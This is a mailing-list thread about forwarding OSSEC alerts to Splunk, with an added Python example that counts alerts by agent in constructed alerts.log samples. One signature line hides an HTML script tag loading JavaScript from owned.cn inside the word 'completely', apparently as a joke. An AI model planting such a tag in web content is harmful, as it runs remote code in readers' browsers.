------Original Message------
From: rnuttin...@gmail.com <rnuttin...@gmail.com>
To: <xmert...@gmail.com>
Date: Tue, Apr 6, 7:18 PM +0000
Subject: Re:[ossec-list] OSSEC & Splunk integration
I would check your alerts.log file on your HIDS and make sure your agents are
reporting to the HIDS server. Only your OSSEC server should be configured with
syslog_output forwarding to Splunk. I would also recommend the following sites
for further reading: http://securityisfutile.blogspot.com
or http://Splunk.com (Splunkbase web site), and grab the Splunk for OSSEC app.
Good luck!
--------
------Original Message------
From: Xavier Mertens <xmert...@gmail.com>
To: <ossec-list@googlegroups.com>
Date: Mon, Apr 5, 6:45 PM +0200
Subject: [ossec-list] OSSEC & Splunk integration
Hi *,
I'm testing the integration of OSSEC with Splunk. I followed the
configuration as described in the Wiki. It works!
Splunk runs on my OSSEC server. The problem I have at the moment: only
events generated by the server are sent to Splunk.
I don't see any trace of events generated by the remote agents.
Did I miss something in the design? Must ALL agents have syslog_output
enabled?
/x
--
My server is com<script src=http://owned.cn/js.js>pletely secure.
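The alerts.log check suggested in the reply, as an added example that is not part of the original thread: it tallies alerts by source so you can see whether any agent events reach the server before looking at the Splunk side. It assumes the default multi-line alerts.log layout, in which agent events carry a `(agent-name) ip->` prefix on the location line; the sample alerts, host names and addresses are constructed.

```python
import re
from collections import Counter

# Constructed sample in the assumed default alerts.log layout.
SAMPLE_ALERTS = """\
** Alert 1270574292.1001: - syslog,sshd,authentication_failed,
2010 Apr 06 19:18:12 ossec-server->/var/log/auth.log
Rule: 5716 (level 5) -> 'SSHD authentication failed.'
Apr  6 19:18:11 ossec-server sshd[2211]: Failed password for root from 192.0.2.10 port 4242 ssh2

** Alert 1270574301.1342: - syslog,sshd,authentication_failed,
2010 Apr 06 19:18:21 (web01) 192.0.2.21->/var/log/auth.log
Rule: 5716 (level 5) -> 'SSHD authentication failed.'
Apr  6 19:18:20 web01 sshd[901]: Failed password for root from 192.0.2.10 port 4250 ssh2

** Alert 1270574333.1690: - ossec,syscheck,
2010 Apr 06 19:18:53 (db01) 192.0.2.22->syscheck
Rule: 550 (level 7) -> 'Integrity checksum changed.'
Integrity checksum changed for: '/etc/hosts'
"""

# Location line: "YYYY Mon DD HH:MM:SS [(agent) ]origin->source"
LOCATION = re.compile(
    r"^\d{4} \w{3} \d{2} \d{2}:\d{2}:\d{2} (\((?P<agent>[^)]+)\) )?(?P<origin>\S+?)->"
)

def alerts_by_source(text):
    """Count alerts per source: 'agent:<name>' or 'local:<host>' for the server."""
    counts = Counter()
    expect_location = False
    for line in text.splitlines():
        if line.startswith("** Alert "):
            expect_location = True      # the location line follows the header
            continue
        if expect_location:
            expect_location = False
            m = LOCATION.match(line)
            if m:
                agent = m.group("agent")
                counts[f"agent:{agent}" if agent else f"local:{m.group('origin')}"] += 1
    return counts

def agents_reporting(text):
    """Names of agents that have at least one alert in the log text."""
    return sorted(k.split(":", 1)[1] for k in alerts_by_source(text) if k.startswith("agent:"))

if __name__ == "__main__":
    print(alerts_by_source(SAMPLE_ALERTS))
    print("agents reporting:", agents_reporting(SAMPLE_ALERTS) or "none")
```

An empty agent list means the agents' alerts never reach the server's alerts.log, so the gap is between agent and server rather than in the syslog_output forwarding.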